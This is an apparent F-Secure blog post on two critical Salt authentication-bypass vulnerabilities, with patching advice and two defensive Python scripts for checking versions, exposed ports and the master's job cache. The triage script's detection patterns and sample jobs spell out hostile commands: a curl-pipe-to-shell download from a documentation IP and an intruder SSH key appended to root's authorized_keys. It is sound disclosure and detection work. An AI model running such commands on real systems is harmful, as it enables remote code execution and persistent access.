“Patch by Friday or compromised by Monday,” warns F-Secure Principal Consultant Olle Segerdahl. “That’s how I’d describe the dilemma facing admins who have their Salt master hosts exposed to the internet.”
Olle’s warning refers to two new Salt vulnerabilities (CVE-2020-11651 and CVE-2020-11652) disclosed earlier today in an F-Secure Labs advisory. Salt is open-source software that organizations use to maintain data centers and cloud environments; it is also part of SaltStack’s infrastructure, network, and security automation products. SaltStack issued patches (versions 3000.2 and 2019.2.4) for the vulnerabilities yesterday.
Olle and his team discovered the vulnerabilities during a regular client engagement and reported them to SaltStack in mid-March. Attackers can exploit them to bypass the authentication and authorization controls that regulate access to Salt deployments (which consist of a “master” server and any number of “minion” agents that carry out tasks and collect data for the system). An attacker exploiting these vulnerabilities can execute code remotely as root on the master and, consequently, on every minion connected to it.
Attackers could simply use the master and its minions (which could amount to hundreds of servers) to mine cryptocurrencies. But skilled attackers can carry out higher-impact attacks: they may start by installing backdoors to explore the network, then move on to stealing confidential data, extortion (through ransomware or threats to leak sensitive information), or other attacks tailored to their specific target and objectives.
Vulnerabilities don’t get much worse. As F-Secure Chief Research Officer Mikko Hypponen tweeted earlier in the week, they were given a 10 in the Common Vulnerability Scoring System (CVSS). That is the highest score possible; under CVSS v3, scores from 9.0 to 10.0 fall in the Critical band used by the National Vulnerability Database.
However, what really concerns Olle is the 6000 Salt masters he found exposed to the internet while doing his research. Salt, he says, is very popular in cloud environments like AWS and GCP.
“I was expecting the number to be a lot lower. There aren’t many reasons to expose infrastructure management systems, which is what a lot of companies use Salt for, to the internet,” says Olle. “When new vulnerabilities go public, attackers always race to exploit exposed, vulnerable hosts before admins patch or hide them. So if I were running one of these 6000 masters, I wouldn’t feel comfortable leaving work for the weekend knowing it’s a target.”
The vulnerabilities affect Salt 3000.1 and earlier (and, in the 2019.2 line, every release before 2019.2.4), which covers essentially every Salt deployment in use before SaltStack’s update. And while attackers will have a harder time reaching hosts that are not exposed to the internet, they can still exploit them after gaining a foothold in the corporate network by other means.
Olle recommends that organizations use SaltStack’s auto-update capabilities to make sure they receive this and future patches as quickly as possible. He also suggests that companies with exposed Salt hosts use additional controls to restrict access to the Salt master ports (4505 and 4506 in default configurations), or at least block the hosts from the open internet. SaltStack has additional guidance on hardening Salt deployments on its website.
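A quick self-check for the two recommendations above, written as an added example rather than code from F-Secure or SaltStack: it parses the version string printed by `salt-master --version` and compares it against the fixed releases named above (3000.2 for the 3000.x line, 2019.2.4 for the date-numbered line, with every older release treated as affected), then reads `/proc/net/tcp` to report whether the default master ports 4505 and 4506 are bound to all interfaces. The Linux `/proc/net/tcp` layout and the constructed sample excerpt are this example’s own assumptions.

```python
"""Check a Salt master's release against the fixes for CVE-2020-11651 /
CVE-2020-11652 and report which default master ports listen on every interface.

The fixed releases (3000.2 and 2019.2.4) are those named in the announcement.
The /proc/net/tcp parsing assumes a Linux host; the sample below is constructed."""
import re
import socket
import subprocess
from typing import Dict, Tuple

FIXED_3000 = (3000, 2)     # 3000.x line (integer numbering): fixed in 3000.2
FIXED_2019 = (2019, 2, 4)  # 2019.2.x line (date-based numbering): fixed in 2019.2.4
SALT_MASTER_PORTS = {4505: "publish", 4506: "request"}  # Salt default ports


def parse_salt_version(text: str) -> Tuple[int, ...]:
    """Turn 'salt 3000.1', 'salt-master 2019.2.3' or plain '3000.1' into ints.

    A leading 'v' is stripped and a suffix such as 'rc1' ends the parse."""
    token = text.strip().split()[-1].lstrip("vV")
    parts = []
    for comp in token.split("."):
        m = re.match(r"\d+", comp)
        if not m:
            break
        parts.append(int(m.group()))
    if not parts:
        raise ValueError(f"no version number in {text!r}")
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """True when the release predates the fix for its line.

    Salt moved from date-based numbers (2019.2.x) to plain integers (3000.x), so
    each line has its own cut-off. Everything older than 2019.2.4 (2018.3.x and
    earlier) is treated as affected, which is what '3000.1 and earlier' means."""
    v = parse_salt_version(version)
    if v[0] >= 3000:
        return v < FIXED_3000
    return v < FIXED_2019


def _hex_to_ipv4(hexaddr: str) -> str:
    # /proc/net/tcp writes the address in host byte order, so on a
    # little-endian host (x86) the four bytes must be reversed.
    return socket.inet_ntoa(bytes.fromhex(hexaddr)[::-1])


def salt_listeners(proc_net_tcp: str) -> Dict[int, str]:
    """Map each Salt master port in LISTEN state to the address it is bound to."""
    found: Dict[int, str] = {}
    for line in proc_net_tcp.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[3] != "0A":  # 0A is TCP LISTEN; also skips the header
            continue
        addr_hex, port_hex = fields[1].split(":")
        port = int(port_hex, 16)
        if port in SALT_MASTER_PORTS:
            found[port] = _hex_to_ipv4(addr_hex)
    return found


def exposed_ports(proc_net_tcp: str) -> Dict[int, str]:
    """Master ports bound to the wildcard address, i.e. reachable on every interface."""
    return {p: a for p, a in salt_listeners(proc_net_tcp).items() if a == "0.0.0.0"}


# Constructed /proc/net/tcp excerpt: 4505 (0x1199) listening on 0.0.0.0,
# 4506 (0x119A) listening on 10.0.2.15, plus one established (state 01) connection.
SAMPLE_PROC_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:1199 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0F02000A:119A 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0\n"
    "   2: 0F02000A:1199 0A000315:E1A4 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 20 4 30 10 -1\n"
)


def main() -> None:
    try:
        out = subprocess.run(["salt-master", "--version"], capture_output=True,
                             text=True, check=True).stdout
        verdict = "VULNERABLE, patch now" if is_vulnerable(out) else "fixed release"
        print(f"{out.strip()} -> {verdict}")
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("salt-master not found on this host")
    try:
        with open("/proc/net/tcp") as fh:
            tcp = fh.read()
    except OSError:
        tcp = SAMPLE_PROC_NET_TCP  # fall back to the constructed sample
    for port, addr in sorted(salt_listeners(tcp).items()):
        print(f"{SALT_MASTER_PORTS[port]} port {port} bound to {addr}")
    for port in exposed_ports(tcp):
        print(f"port {port} listens on all interfaces: restrict it to minion networks")


if __name__ == "__main__":
    main()
```

Run it as root on the master. A port bound to 0.0.0.0 is not necessarily reachable from the internet (a perimeter firewall may already block it), so treat the exposure report as a prompt to check host and network firewall rules for 4505 and 4506, not as proof either way.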
On a positive note, F-Secure has no evidence or reports of anyone exploiting these vulnerabilities in real attacks.
Furthermore, organizations can detect attacks that exploit these vulnerabilities.
While F-Secure has found no reliable log entries that indicate the attacks Olle researched, concerned organizations can search their master hosts for signs of intrusion. The Salt master keeps records of the jobs it has dispatched (its job cache), which defenders can search for malicious content or suspicious activity.
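One way to start the job-cache review described above, written as an added example (the heuristics are mine, not F-Secure’s or SaltStack’s): it walks the master’s local job cache, which by default lives under `/var/cache/salt/master/jobs` as msgpack-encoded `.load.p` files holding the published job (function, arguments, target, user, job id), and flags jobs that run arbitrary commands, target every minion, come from a user who does not normally publish jobs, or carry arguments that look like download-and-execute or SSH-key tampering. The cache path, file layout, risky-function list and the constructed sample jobs are assumptions of this example.

```python
"""Triage a Salt master's job cache for jobs that an attacker who bypassed master
authentication could have published. Added example; the heuristics are this
example's own, not the advisory's.

Assumptions: the default local job cache lives under /var/cache/salt/master/jobs
and each job directory holds a msgpack-encoded '.load.p' carrying the published
job (keys such as fun, arg, tgt, user, jid). The sample jobs below are constructed."""
import os
import re
from typing import Dict, Iterable, Iterator, List, Tuple

JOB_CACHE_ROOT = "/var/cache/salt/master/jobs"

# Execution-module functions that run arbitrary commands or write arbitrary files.
RISKY_FUNS = {"cmd.run", "cmd.run_all", "cmd.shell", "cmd.script", "cmd.exec_code",
              "file.write", "file.append"}

# Argument patterns typical of post-exploitation: download-and-run, decode-and-run,
# SSH key or account tampering. Heuristic, chosen for this example.
SUSPICIOUS_ARG_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    re.compile(r"\bbase64\s+(-d|--decode)\b"),
    re.compile(r"authorized_keys"),
    re.compile(r"/etc/(passwd|shadow|sudoers)\b"),
]


def triage_job(load: Dict, expected_users: Iterable[str]) -> List[str]:
    """Return the reasons one job load looks suspicious; an empty list means clean."""
    reasons: List[str] = []
    fun = str(load.get("fun", ""))
    tgt = str(load.get("tgt", ""))
    user = str(load.get("user", ""))
    args = " ".join(str(a) for a in (load.get("arg") or []))

    if fun in RISKY_FUNS:
        reasons.append(f"risky function {fun}")
    if fun.startswith("cmd.") and tgt in ("*", ""):
        reasons.append("command execution targeted at every minion")
    if user not in set(expected_users):
        reasons.append(f"job published as unexpected user {user!r}")
    for pat in SUSPICIOUS_ARG_PATTERNS:
        if pat.search(args):
            reasons.append(f"argument matches /{pat.pattern}/")
    return reasons


def triage_jobs(loads: Iterable[Dict],
                expected_users: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Run triage_job over many loads and return (jid, reasons) for the suspicious
    ones, in the order seen. Job ids are timestamps, so sorted input is a timeline."""
    expected = set(expected_users)
    findings: List[Tuple[str, List[str]]] = []
    for load in loads:
        reasons = triage_job(load, expected)
        if reasons:
            findings.append((str(load.get("jid", "?")), reasons))
    return findings


def iter_job_loads(root: str = JOB_CACHE_ROOT) -> Iterator[Dict]:
    """Yield the '.load.p' payload of every cached job. Needs the msgpack package,
    which Salt itself depends on, so it is present on a master."""
    import msgpack
    for dirpath, _dirs, files in sorted(os.walk(root)):
        if ".load.p" in files:
            with open(os.path.join(dirpath, ".load.p"), "rb") as fh:
                yield msgpack.unpackb(fh.read(), raw=False)


# Constructed job loads: two routine jobs from the usual operator, then two that
# look like an intruder (203.0.113.7 is a documentation address).
SAMPLE_LOADS = [
    {"jid": "20200430101500000001", "fun": "test.ping", "arg": [], "tgt": "*",
     "user": "saltadmin"},
    {"jid": "20200430101600000002", "fun": "state.apply", "arg": ["webserver"],
     "tgt": "web*", "user": "saltadmin"},
    {"jid": "20200430103100000003", "fun": "cmd.run", "tgt": "*", "user": "root",
     "arg": ["curl -s http://203.0.113.7/x.sh | sh"]},
    {"jid": "20200430103200000004", "fun": "file.append", "tgt": "db01",
     "user": "saltadmin",
     "arg": ["/root/.ssh/authorized_keys", "ssh-rsa AAAAB3... intruder@evil"]},
]


def main() -> None:
    expected_users = {"saltadmin"}  # whoever legitimately runs `salt` on your master
    if os.path.isdir(JOB_CACHE_ROOT):
        loads: Iterable[Dict] = iter_job_loads()
    else:
        print("(no job cache found, triaging the constructed sample)")
        loads = SAMPLE_LOADS
    for jid, reasons in triage_jobs(loads, expected_users):
        print(jid)
        for r in reasons:
            print("   -", r)


if __name__ == "__main__":
    main()
```

Because job ids are timestamps, flagged jobs can be lined up against change records and the disclosure date. An attacker who gained root on the master can also edit or purge this cache, so a clean result does not rule out compromise; corroborate with evidence from the minions and with the detection advice in the advisory.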
More advice on detecting current or previous intrusions using these vulnerabilities, as well as technical details on the vulnerabilities themselves, is available in F-Secure Labs’ advisory.